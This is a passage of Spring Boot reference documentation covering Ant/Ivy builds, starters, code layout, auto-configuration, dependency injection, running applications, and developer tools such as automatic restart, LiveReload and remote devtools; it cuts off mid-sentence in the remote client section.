name=\"spring-boot-starter\"\n\t\t\t\trev=\"${spring-boot.version}\" conf=\"compile\" \/>\n\t\t<\/dependencies>\n\t<\/ivy-module>\n----\n\nA typical `build.xml` looks like the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<project\n\t\txmlns:ivy=\"antlib:org.apache.ivy.ant\"\n\t\txmlns:spring-boot=\"antlib:org.springframework.boot.ant\"\n\t\tname=\"myapp\" default=\"build\">\n\n\t\t<property name=\"spring-boot.version\" value=\"{spring-boot-version}\" \/>\n\n\t\t<target name=\"resolve\" description=\"--> retrieve dependencies with ivy\">\n\t\t\t<ivy:retrieve pattern=\"lib\/[conf]\/[artifact]-[type]-[revision].[ext]\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"classpaths\" depends=\"resolve\">\n\t\t\t<path id=\"compile.classpath\">\n\t\t\t\t<fileset dir=\"lib\/compile\" includes=\"*.jar\" \/>\n\t\t\t<\/path>\n\t\t<\/target>\n\n\t\t<target name=\"init\" depends=\"classpaths\">\n\t\t\t<mkdir dir=\"build\/classes\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"compile\" depends=\"init\" description=\"compile\">\n\t\t\t<javac srcdir=\"src\/main\/java\" destdir=\"build\/classes\" classpathref=\"compile.classpath\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"build\" depends=\"compile\">\n\t\t\t<spring-boot:exejar destfile=\"build\/myapp.jar\" classes=\"build\/classes\">\n\t\t\t\t<spring-boot:lib>\n\t\t\t\t\t<fileset dir=\"lib\/runtime\" \/>\n\t\t\t\t<\/spring-boot:lib>\n\t\t\t<\/spring-boot:exejar>\n\t\t<\/target>\n\t<\/project>\n----\n\nTIP: If you do not want to use the `spring-boot-antlib` module, see the _<<howto.adoc#howto-build-an-executable-archive-with-ant>>_ \"`How-to`\" .\n\n\n\n[[using-boot-starter]]\n=== Starters\nStarters are a set of convenient dependency descriptors that you can include in your application.\nYou get a one-stop shop for all the Spring and related technologies that you need without having to hunt through sample code and copy-paste loads of dependency descriptors.\nFor example, if you want to get started using Spring and JPA for database access, include the `spring-boot-starter-data-jpa` dependency in your project.\n\nThe starters contain a lot of the dependencies that you need to get a project up and running quickly and with a consistent, supported set of managed transitive dependencies.\n\n.What's in a name\n****\nAll **official** starters follow a similar naming pattern; `+spring-boot-starter-*+`, where `+*+` is a particular type of application.\nThis naming structure is intended to help when you need to find a starter.\nThe Maven integration in many IDEs lets you search dependencies by name.\nFor example, with the appropriate Eclipse or STS plugin installed, you can press `ctrl-space` in the POM editor and type \"`spring-boot-starter`\" for a complete list.\n\nAs explained in the \"`<<spring-boot-features#boot-features-custom-starter,Creating Your Own Starter>>`\" section, third party starters should not start with `spring-boot`, as it is reserved for official Spring Boot artifacts.\nRather, a third-party starter typically starts with the name of the project.\nFor example, a third-party starter project called `thirdpartyproject` would typically be named `thirdpartyproject-spring-boot-starter`.\n****\n\nThe following application starters are provided by Spring Boot under the `org.springframework.boot` group:\n\n.Spring Boot application starters\ninclude::{generated-resources-root}\/application-starters.adoc[]\n\nIn addition to the application starters, the following starters can be used to add _<<production-ready-features.adoc#production-ready, production ready>>_ features:\n\n.Spring Boot production starters\ninclude::{generated-resources-root}\/production-starters.adoc[]\n\nFinally, Spring Boot also includes the following starters that can be used if you want to exclude or swap specific technical facets:\n\n.Spring Boot technical starters\ninclude::{generated-resources-root}\/technical-starters.adoc[]\n\nTo learn how to swap technical facets, please see the how-to documentation for <<howto.adoc#howto-use-another-web-server, swapping web server>> and <<howto.adoc#howto-configure-log4j-for-logging, logging system>>.\n\nTIP: For a list of additional community contributed starters, see the {spring-boot-master-code}\/spring-boot-project\/spring-boot-starters\/README.adoc[README file] in the `spring-boot-starters` module on GitHub.\n\n\n\n[[using-boot-structuring-your-code]]\n== Structuring Your Code\nSpring Boot does not require any specific code layout to work.\nHowever, there are some best practices that help.\n\n\n\n[[using-boot-using-the-default-package]]\n=== Using the \"`default`\" Package\nWhen a class does not include a `package` declaration, it is considered to be in the \"`default package`\".\nThe use of the \"`default package`\" is generally discouraged and should be avoided.\nIt can cause particular problems for Spring Boot applications that use the `@ComponentScan`, `@ConfigurationPropertiesScan`, `@EntityScan`, or `@SpringBootApplication` annotations, since every class from every jar is read.\n\nTIP: We recommend that you follow Java's recommended package naming conventions and use a reversed domain name (for example, `com.example.project`).\n\n\n\n[[using-boot-locating-the-main-class]]\n=== Locating the Main Application Class\nWe generally recommend that you locate your main application class in a root package above other classes.\nThe <<using-boot-using-springbootapplication-annotation, `@SpringBootApplication` annotation>> is often placed on your main class, and it implicitly defines a base \"`search package`\" for certain items.\nFor example, if you are writing a JPA application, the package of the `@SpringBootApplication` annotated class is used to search for `@Entity` items.\nUsing a root package also allows component scan to apply only on your project.\n\nTIP: If you don't want to use `@SpringBootApplication`, the `@EnableAutoConfiguration` and `@ComponentScan` annotations that it imports defines that behaviour so you can also use those instead.\n\nThe following listing shows a typical layout:\n\n[indent=0]\n----\n\tcom\n\t +- example\n\t +- myapplication\n\t +- Application.java\n\t |\n\t +- customer\n\t | +- Customer.java\n\t | +- CustomerController.java\n\t | +- CustomerService.java\n\t | +- CustomerRepository.java\n\t |\n\t +- order\n\t +- Order.java\n\t +- OrderController.java\n\t +- OrderService.java\n\t +- OrderRepository.java\n----\n\nThe `Application.java` file would declare the `main` method, along with the basic `@SpringBootApplication`, as follows:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\n\n\n[[using-boot-configuration-classes]]\n== Configuration Classes\nSpring Boot favors Java-based configuration.\nAlthough it is possible to use `SpringApplication` with XML sources, we generally recommend that your primary source be a single `@Configuration` class.\nUsually the class that defines the `main` method is a good candidate as the primary `@Configuration`.\n\nTIP: Many Spring configuration examples have been published on the Internet that use XML configuration.\nIf possible, always try to use the equivalent Java-based configuration.\nSearching for `+Enable*+` annotations can be a good starting point.\n\n\n\n[[using-boot-importing-configuration]]\n=== Importing Additional Configuration Classes\nYou need not put all your `@Configuration` into a single class.\nThe `@Import` annotation can be used to import additional configuration classes.\nAlternatively, you can use `@ComponentScan` to automatically pick up all Spring components, including `@Configuration` classes.\n\n\n\n[[using-boot-importing-xml-configuration]]\n=== Importing XML Configuration\nIf you absolutely must use XML based configuration, we recommend that you still start with a `@Configuration` class.\nYou can then use an `@ImportResource` annotation to load XML configuration files.\n\n\n\n[[using-boot-auto-configuration]]\n== Auto-configuration\nSpring Boot auto-configuration attempts to automatically configure your Spring application based on the jar dependencies that you have added.\nFor example, if `HSQLDB` is on your classpath, and you have not manually configured any database connection beans, then Spring Boot auto-configures an in-memory database.\n\nYou need to opt-in to auto-configuration by adding the `@EnableAutoConfiguration` or `@SpringBootApplication` annotations to one of your `@Configuration` classes.\n\nTIP: You should only ever add one `@SpringBootApplication` or `@EnableAutoConfiguration` annotation.\nWe generally recommend that you add one or the other to your primary `@Configuration` class only.\n\n\n\n[[using-boot-replacing-auto-configuration]]\n=== Gradually Replacing Auto-configuration\nAuto-configuration is non-invasive.\nAt any point, you can start to define your own configuration to replace specific parts of the auto-configuration.\nFor example, if you add your own `DataSource` bean, the default embedded database support backs away.\n\nIf you need to find out what auto-configuration is currently being applied, and why, start your application with the `--debug` switch.\nDoing so enables debug logs for a selection of core loggers and logs a conditions report to the console.\n\n\n\n[[using-boot-disabling-specific-auto-configuration]]\n=== Disabling Specific Auto-configuration Classes\nIf you find that specific auto-configuration classes that you do not want are being applied, you can use the exclude attribute of `@SpringBootApplication` to disable them, as shown in the following example:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.*;\n\timport org.springframework.boot.autoconfigure.jdbc.*;\n\n\t@SpringBootApplication(exclude={DataSourceAutoConfiguration.class})\n\tpublic class MyApplication {\n\t}\n----\n\nIf the class is not on the classpath, you can use the `excludeName` attribute of the annotation and specify the fully qualified name instead.\nIf you prefer to use `@EnableAutoConfiguration` rather than `@SpringBootApplication`, `exclude` and `excludeName` are also available.\nFinally, you can also control the list of auto-configuration classes to exclude by using the configprop:spring.autoconfigure.exclude[] property.\n\nTIP: You can define exclusions both at the annotation level and by using the property.\n\nNOTE: Even though auto-configuration classes are `public`, the only aspect of the class that is considered public API is the name of the class which can be used for disabling the auto-configuration.\nThe actual contents of those classes, such as nested configuration classes or bean methods are for internal use only and we do not recommend using those directly.\n\n\n\n[[using-boot-spring-beans-and-dependency-injection]]\n== Spring Beans and Dependency Injection\nYou are free to use any of the standard Spring Framework techniques to define your beans and their injected dependencies.\nWe often find that using `@ComponentScan` (to find your beans) and using `@Autowired` (to do constructor injection) works well.\n\nIf you structure your code as suggested above (locating your application class in a root package), you can add `@ComponentScan` without any arguments.\nAll of your application components (`@Component`, `@Service`, `@Repository`, `@Controller` etc.) are automatically registered as Spring Beans.\n\nThe following example shows a `@Service` Bean that uses constructor injection to obtain a required `RiskAssessor` bean:\n\n[source,java,indent=0]\n----\n\tpackage com.example.service;\n\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Service;\n\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\t@Autowired\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf a bean has one constructor, you can omit the `@Autowired`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: Notice how using constructor injection lets the `riskAssessor` field be marked as `final`, indicating that it cannot be subsequently changed.\n\n\n\n[[using-boot-using-springbootapplication-annotation]]\n== Using the @SpringBootApplication Annotation\nMany Spring Boot developers like their apps to use auto-configuration, component scan and be able to define extra configuration on their \"application class\".\nA single `@SpringBootApplication` annotation can be used to enable those three features, that is:\n\n* `@EnableAutoConfiguration`: enable <<using-boot-auto-configuration,Spring Boot's auto-configuration mechanism>>\n* `@ComponentScan`: enable `@Component` scan on the package where the application is located (see <<using-boot-structuring-your-code,the best practices>>)\n* `@Configuration`: allow to register extra beans in the context or import additional configuration classes\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication \/\/ same as @Configuration @EnableAutoConfiguration @ComponentScan\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nNOTE: `@SpringBootApplication` also provides aliases to customize the attributes of `@EnableAutoConfiguration` and `@ComponentScan`.\n\n[NOTE]\n====\nNone of these features are mandatory and you may choose to replace this single annotation by any of the features that it enables.\nFor instance, you may not want to use component scan or configuration properties scan in your application:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.context.annotation.ComponentScan\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.context.annotation.Import;\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@Import({ MyConfig.class, MyAnotherConfig.class })\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nIn this example, `Application` is just like any other Spring Boot application except that `@Component`-annotated classes and `@ConfigurationProperties`-annotated classes are not detected automatically and the user-defined beans are imported explicitly (see `@Import`).\n====\n\n\n\n[[using-boot-running-your-application]]\n== Running Your Application\nOne of the biggest advantages of packaging your application as a jar and using an embedded HTTP server is that you can run your application as you would any other.\nThe sample applies to debugging Spring Boot applications.\nYou do not need any special IDE plugins or extensions.\n\nNOTE: This section only covers jar based packaging.\nIf you choose to package your application as a war file, you should refer to your server and IDE documentation.\n\n\n\n[[using-boot-running-from-an-ide]]\n=== Running from an IDE\nYou can run a Spring Boot application from your IDE as a Java application.\nHowever, you first need to import your project.\nImport steps vary depending on your IDE and build system.\nMost IDEs can import Maven projects directly.\nFor example, Eclipse users can select `Import...` -> `Existing Maven Projects` from the `File` menu.\n\nIf you cannot directly import your project into your IDE, you may be able to generate IDE metadata by using a build plugin.\nMaven includes plugins for https:\/\/maven.apache.org\/plugins\/maven-eclipse-plugin\/[Eclipse] and https:\/\/maven.apache.org\/plugins\/maven-idea-plugin\/[IDEA].\nGradle offers plugins for {gradle-docs}\/userguide.html[various IDEs].\n\nTIP: If you accidentally run a web application twice, you see a \"`Port already in use`\" error.\nSTS users can use the `Relaunch` button rather than the `Run` button to ensure that any existing instance is closed.\n\n\n\n[[using-boot-running-as-a-packaged-application]]\n=== Running as a Packaged Application\nIf you use the Spring Boot Maven or Gradle plugins to create an executable jar, you can run your application using `java -jar`, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\nIt is also possible to run a packaged application with remote debugging support enabled.\nDoing so lets you attach a debugger to your packaged application, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -Xdebug -Xrunjdwp:server=y,transport=dt_socket,address=8000,suspend=n \\\n\t -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\n\n\n[[using-boot-running-with-the-maven-plugin]]\n=== Using the Maven Plugin\nThe Spring Boot Maven plugin includes a `run` goal that can be used to quickly compile and run your application.\nApplications run in an exploded form, as they do in your IDE.\nThe following example shows a typical Maven command to run a Spring Boot application:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ mvn spring-boot:run\n----\n\nYou might also want to use the `MAVEN_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export MAVEN_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-running-with-the-gradle-plugin]]\n=== Using the Gradle Plugin\nThe Spring Boot Gradle plugin also includes a `bootRun` task that can be used to run your application in an exploded form.\nThe `bootRun` task is added whenever you apply the `org.springframework.boot` and `java` plugins and is shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ gradle bootRun\n----\n\nYou might also want to use the `JAVA_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export JAVA_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-hot-swapping]]\n=== Hot Swapping\nSince Spring Boot applications are plain Java applications, JVM hot-swapping should work out of the box.\nJVM hot swapping is somewhat limited with the bytecode that it can replace.\nFor a more complete solution, https:\/\/www.jrebel.com\/products\/jrebel[JRebel] can be used.\n\nThe `spring-boot-devtools` module also includes support for quick application restarts.\nSee the <<using-boot-devtools>> section later in this chapter and the <<howto.adoc#howto-hotswapping, Hot swapping \"`How-to`\">> for details.\n\n\n\n[[using-boot-devtools]]\n== Developer Tools\nSpring Boot includes an additional set of tools that can make the application development experience a little more pleasant.\nThe `spring-boot-devtools` module can be included in any project to provide additional development-time features.\nTo include devtools support, add the module dependency to your build, as shown in the following listings for Maven and Gradle:\n\n.Maven\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-devtools<\/artifactId>\n\t\t\t<optional>true<\/optional>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n.Gradle\n[source,groovy,indent=0,subs=\"attributes\"]\n----\n\tconfigurations {\n\t\tdevelopmentOnly\n\t\truntimeClasspath {\n\t\t\textendsFrom developmentOnly\n\t\t}\n\t}\n\tdependencies {\n\t\tdevelopmentOnly(\"org.springframework.boot:spring-boot-devtools\")\n\t}\n----\n\nNOTE: Developer tools are automatically disabled when running a fully packaged application.\nIf your application is launched from `java -jar` or if it is started from a special classloader, then it is considered a \"`production application`\".\nIf that does not apply to you (i.e. if you run your application from a container), consider excluding devtools or set the `-Dspring.devtools.restart.enabled=false` system property.\n\nTIP: Flagging the dependency as optional in Maven or using a custom `developmentOnly` configuration in Gradle (as shown above) is a best practice that prevents devtools from being transitively applied to other modules that use your project.\n\nTIP: Repackaged archives do not contain devtools by default.\nIf you want to use a <<using-boot-devtools-remote,certain remote devtools feature>>, you need to disable the `excludeDevtools` build property to include it.\nThe property is supported with both the Maven and Gradle plugins.\n\n\n\n[[using-boot-devtools-property-defaults]]\n=== Property Defaults\nSeveral of the libraries supported by Spring Boot use caches to improve performance.\nFor example, <<spring-boot-features#boot-features-spring-mvc-template-engines,template engines>> cache compiled templates to avoid repeatedly parsing template files.\nAlso, Spring MVC can add HTTP caching headers to responses when serving static resources.\n\nWhile caching is very beneficial in production, it can be counter-productive during development, preventing you from seeing the changes you just made in your application.\nFor this reason, spring-boot-devtools disables the caching options by default.\n\nCache options are usually configured by settings in your `application.properties` file.\nFor example, Thymeleaf offers the configprop:spring.thymeleaf.cache[] property.\nRather than needing to set these properties manually, the `spring-boot-devtools` module automatically applies sensible development-time configuration.\n\nBecause you need more information about web requests while developing Spring MVC and Spring WebFlux applications, developer tools will enable `DEBUG` logging for the `web` logging group.\nThis will give you information about the incoming request, which handler is processing it, the response outcome, etc.\nIf you wish to log all request details (including potentially sensitive information), you can turn on the configprop:spring.http.log-request-details[] configuration property.\n\nNOTE: If you don't want property defaults to be applied you can set configprop:spring.devtools.add-properties[] to `false` in your `application.properties`.\n\nTIP: For a complete list of the properties that are applied by the devtools, see {spring-boot-devtools-module-code}\/env\/DevToolsPropertyDefaultsPostProcessor.java[DevToolsPropertyDefaultsPostProcessor].\n\n\n\n[[using-boot-devtools-restart]]\n=== Automatic Restart\nApplications that use `spring-boot-devtools` automatically restart whenever files on the classpath change.\nThis can be a useful feature when working in an IDE, as it gives a very fast feedback loop for code changes.\nBy default, any entry on the classpath that points to a folder is monitored for changes.\nNote that certain resources, such as static assets and view templates, <<using-boot-devtools-restart-exclude, do not need to restart the application>>.\n\n.Triggering a restart\n****\nAs DevTools monitors classpath resources, the only way to trigger a restart is to update the classpath.\nThe way in which you cause the classpath to be updated depends on the IDE that you are using:\n\n* In Eclipse, saving a modified file causes the classpath to be updated and triggers a restart.\n* In IntelliJ IDEA, building the project (`Build +->+ Build Project`) has the same effect.\n* If using a build plugin, running `mvn compile` for Maven or `gradle build` for Gradle will trigger a restart. \n****\n\nNOTE: If you are restarting with Maven or Gradle using the build plugin you must leave the `forking` set to `enabled`.\nIf you disable forking, the isolated application classloader used by devtools will not be created and restarts will not operate properly.\n\nTIP: Automatic restart works very well when used with LiveReload.\n<<using-boot-devtools-livereload,See the LiveReload section>> for details.\nIf you use JRebel, automatic restarts are disabled in favor of dynamic class reloading.\nOther devtools features (such as LiveReload and property overrides) can still be used.\n\nNOTE: DevTools relies on the application context's shutdown hook to close it during a restart.\nIt does not work correctly if you have disabled the shutdown hook (`SpringApplication.setRegisterShutdownHook(false)`).\n\nNOTE: When deciding if an entry on the classpath should trigger a restart when it changes, DevTools automatically ignores projects named `spring-boot`, `spring-boot-devtools`, `spring-boot-autoconfigure`, `spring-boot-actuator`, and `spring-boot-starter`.\n\nNOTE: DevTools needs to customize the `ResourceLoader` used by the `ApplicationContext`.\nIf your application provides one already, it is going to be wrapped.\nDirect override of the `getResource` method on the `ApplicationContext` is not supported.\n\n[[using-spring-boot-restart-vs-reload]]\n.Restart vs Reload\n****\nThe restart technology provided by Spring Boot works by using two classloaders.\nClasses that do not change (for example, those from third-party jars) are loaded into a _base_ classloader.\nClasses that you are actively developing are loaded into a _restart_ classloader.\nWhen the application is restarted, the _restart_ classloader is thrown away and a new one is created.\nThis approach means that application restarts are typically much faster than \"`cold starts`\", since the _base_ classloader is already available and populated.\n\nIf you find that restarts are not quick enough for your applications or you encounter classloading issues, you could consider reloading technologies such as https:\/\/jrebel.com\/software\/jrebel\/[JRebel] from ZeroTurnaround.\nThese work by rewriting classes as they are loaded to make them more amenable to reloading.\n****\n\n\n\n[[using-boot-devtools-restart-logging-condition-delta]]\n==== Logging changes in condition evaluation\nBy default, each time your application restarts, a report showing the condition evaluation delta is logged.\nThe report shows the changes to your application's auto-configuration as you make changes such as adding or removing beans and setting configuration properties.\n\nTo disable the logging of the report, set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.log-condition-evaluation-delta=false\n----\n\n\n[[using-boot-devtools-restart-exclude]]\n==== Excluding Resources\nCertain resources do not necessarily need to trigger a restart when they are changed.\nFor example, Thymeleaf templates can be edited in-place.\nBy default, changing resources in `\/META-INF\/maven`, `\/META-INF\/resources`, `\/resources`, `\/static`, `\/public`, or `\/templates` does not trigger a restart but does trigger a <<using-boot-devtools-livereload, live reload>>.\nIf you want to customize these exclusions, you can use the configprop:spring.devtools.restart.exclude[] property.\nFor example, to exclude only `\/static` and `\/public` you would set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.exclude=static\/**,public\/**\n----\n\nTIP: If you want to keep those defaults and _add_ additional exclusions, use the configprop:spring.devtools.restart.additional-exclude[] property instead.\n\n\n\n[[using-boot-devtools-restart-additional-paths]]\n==== Watching Additional Paths\nYou may want your application to be restarted or reloaded when you make changes to files that are not on the classpath.\nTo do so, use the configprop:spring.devtools.restart.additional-paths[] property to configure additional paths to watch for changes.\nYou can use the configprop:spring.devtools.restart.exclude[] property <<using-boot-devtools-restart-exclude, described earlier>> to control whether changes beneath the additional paths trigger a full restart or a <<using-boot-devtools-livereload, live reload>>.\n\n\n\n[[using-boot-devtools-restart-disable]]\n==== Disabling Restart\nIf you do not want to use the restart feature, you can disable it by using the configprop:spring.devtools.restart.enabled[] property.\nIn most cases, you can set this property in your `application.properties` (doing so still initializes the restart classloader, but it does not watch for file changes).\n\nIf you need to _completely_ disable restart support (for example, because it does not work with a specific library), you need to set the configprop:spring.devtools.restart.enabled[] `System` property to `false` before calling `SpringApplication.run(...)`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSystem.setProperty(\"spring.devtools.restart.enabled\", \"false\");\n\t\tSpringApplication.run(MyApp.class, args);\n\t}\n----\n\n\n\n[[using-boot-devtools-restart-triggerfile]]\n==== Using a Trigger File\nIf you work with an IDE that continuously compiles changed files, you might prefer to trigger restarts only at specific times.\nTo do so, you can use a \"`trigger file`\", which is a special file that must be modified when you want to actually trigger a restart check.\n\nNOTE: Any update to the file will trigger a check, but restart only actually occurs if Devtools has detected it has something to do.\n\nTo use a trigger file, set the configprop:spring.devtools.restart.trigger-file[] property to the name (excluding any path) of your trigger file.\nThe trigger file must appear somewhere on your classpath.\n\nFor example, if you have a project with the following structure:\n\n[indent=0]\n----\n\tsrc\n\t+- main\n\t +- resources\n\t +- .reloadtrigger\n----\n\nThen your `trigger-file` property would be:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nRestarts will now only happen when the `src\/main\/resources\/.reloadtrigger` is updated.\n\nTIP: You might want to set `spring.devtools.restart.trigger-file` as a <<using-boot-devtools-globalsettings,global setting>>, so that all your projects behave in the same way.\n\nSome IDEs have features that save you from needing to update your trigger file manually.\nhttps:\/\/spring.io\/tools[Spring Tools for Eclipse] and https:\/\/www.jetbrains.com\/idea\/[IntelliJ IDEA (Ultimate Edition)] both have such support.\nWith Spring Tools, you can use the \"`reload`\" button from the console view (as long as your `trigger-file` is named `.reloadtrigger`).\nFor IntelliJ IDEA, you can follow the https:\/\/www.jetbrains.com\/help\/idea\/spring-boot.html#application-update-policies[instructions in their documentation].\n\n\n\n[[using-boot-devtools-customizing-classload]]\n==== Customizing the Restart Classloader\nAs described earlier in the <<using-spring-boot-restart-vs-reload>> section, restart functionality is implemented by using two classloaders.\nFor most applications, this approach works well.\nHowever, it can sometimes cause classloading issues.\n\nBy default, any open project in your IDE is loaded with the \"`restart`\" classloader, and any regular `.jar` file is loaded with the \"`base`\" classloader.\nIf you work on a multi-module project, and not every module is imported into your IDE, you may need to customize things.\nTo do so, you can create a `META-INF\/spring-devtools.properties` file.\n\nThe `spring-devtools.properties` file can contain properties prefixed with `restart.exclude` and `restart.include`.\nThe `include` elements are items that should be pulled up into the \"`restart`\" classloader, and the `exclude` elements are items that should be pushed down into the \"`base`\" classloader.\nThe value of the property is a regex pattern that is applied to the classpath, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\trestart.exclude.companycommonlibs=\/mycorp-common-[\\\\w\\\\d-\\.]+\\.jar\n\trestart.include.projectcommon=\/mycorp-myproj-[\\\\w\\\\d-\\.]+\\.jar\n----\n\nNOTE: All property keys must be unique.\nAs long as a property starts with `restart.include.` or `restart.exclude.` it is considered.\n\nTIP: All `META-INF\/spring-devtools.properties` from the classpath are loaded.\nYou can package files inside your project, or in the libraries that the project consumes.\n\n\n\n[[using-boot-devtools-known-restart-limitations]]\n==== Known Limitations\nRestart functionality does not work well with objects that are deserialized by using a standard `ObjectInputStream`.\nIf you need to deserialize data, you may need to use Spring's `ConfigurableObjectInputStream` in combination with `Thread.currentThread().getContextClassLoader()`.\n\nUnfortunately, several third-party libraries deserialize without considering the context classloader.\nIf you find such a problem, you need to request a fix with the original authors.\n\n\n\n[[using-boot-devtools-livereload]]\n=== LiveReload\nThe `spring-boot-devtools` module includes an embedded LiveReload server that can be used to trigger a browser refresh when a resource is changed.\nLiveReload browser extensions are freely available for Chrome, Firefox and Safari from http:\/\/livereload.com\/extensions\/[livereload.com].\n\nIf you do not want to start the LiveReload server when your application runs, you can set the configprop:spring.devtools.livereload.enabled[] property to `false`.\n\nNOTE: You can only run one LiveReload server at a time.\nBefore starting your application, ensure that no other LiveReload servers are running.\nIf you start multiple applications from your IDE, only the first has LiveReload support.\n\nWARNING: To trigger LiveReload when a file changes, <<using-boot-devtools-restart>> must be enabled.\n\n\n\n[[using-boot-devtools-globalsettings]]\n=== Global Settings\nYou can configure global devtools settings by adding any of the following files to the `$HOME\/.config\/spring-boot` folder:\n\n. `spring-boot-devtools.properties`\n. `spring-boot-devtools.yaml`\n. `spring-boot-devtools.yml`\n\nAny properties added to these file apply to _all_ Spring Boot applications on your machine that use devtools.\nFor example, to configure restart to always use a <<using-boot-devtools-restart-triggerfile, trigger file>>, you would add the following property:\n\n.~\/.config\/spring-boot\/spring-boot-devtools.properties\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nNOTE: If devtools configuration files are not found in `$HOME\/.config\/spring-boot`, the root of the `$HOME` folder is searched for the presence of a `.spring-boot-devtools.properties` file.\nThis allows you to share the devtools global configuration with applications that are on an older version of Spring Boot that does not support the `$HOME\/.config\/spring-boot` location.\n\n[NOTE]\n====\nProfiles are not supported in devtools properties\/yaml files.\n\nAny profiles activated in `.spring-boot-devtools.properties` will not affect the loading of <<spring-boot-features.adoc#boot-features-external-config-profile-specific-properties, profile-specific configuration files>>.\nProfile specific filenames (of the form `spring-boot-devtools-<profile>.properties`) and `spring.profile` sub-documents in YAML files are not supported.\n====\n\n\n\n[[configuring-file-system-watcher]]\n==== Configuring File System Watcher\n{spring-boot-devtools-module-code}\/filewatch\/FileSystemWatcher.java[FileSystemWatcher] works by polling the class changes with a certain time interval, and then waiting for a predefined quiet period to make sure there are no more changes.\nSince Spring Boot relies entirely on the IDE to compile and copy files into the location from where Spring Boot can read them, you might find that there are times when certain changes are not reflected when devtools restarts the application.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.poll-interval=2s\n\tspring.devtools.restart.quiet-period=1s\n----\n\nThe monitored classpath folders are now polled every 2 seconds for changes, and a 1 second quiet period is maintained to make sure there are no additional class changes.\n\n\n\n[[using-boot-devtools-remote]]\n=== Remote Applications\nThe Spring Boot developer tools are not limited to local development.\nYou can also use several features when running applications remotely.\nRemote support is opt-in as enabling it can be a security risk.\nIt should only be enabled when running on a trusted network or when secured with SSL.\nIf neither of these options is available to you, you should not use DevTools' remote support.\nYou should never enable support on a production deployment.\n\nTo enable it, you need to make sure that `devtools` is included in the repackaged archive, as shown in the following listing:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludeDevtools>false<\/excludeDevtools>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nThen you need to set the configprop:spring.devtools.remote.secret[] property.\nLike any important password or secret, the value should be unique and strong such that it cannot be guessed or brute-forced.\n\nRemote devtools support is provided in two parts: a server-side endpoint that accepts connections and a client application that you run in your IDE.\nThe server component is automatically enabled when the configprop:spring.devtools.remote.secret[] property is set.\nThe client component must be launched manually.\n\n\n\n==== Running the Remote Client Application\nThe remote client application is designed to be run from within your IDE.\nYou need to run `org.springframework.boot.devtools.RemoteSpringApplication` with the same classpath as the remote project that you connect to.\nThe application's single required argument is the remote URL to which it connects.\n\nFor example, if you are using Eclipse or STS and you have a project named 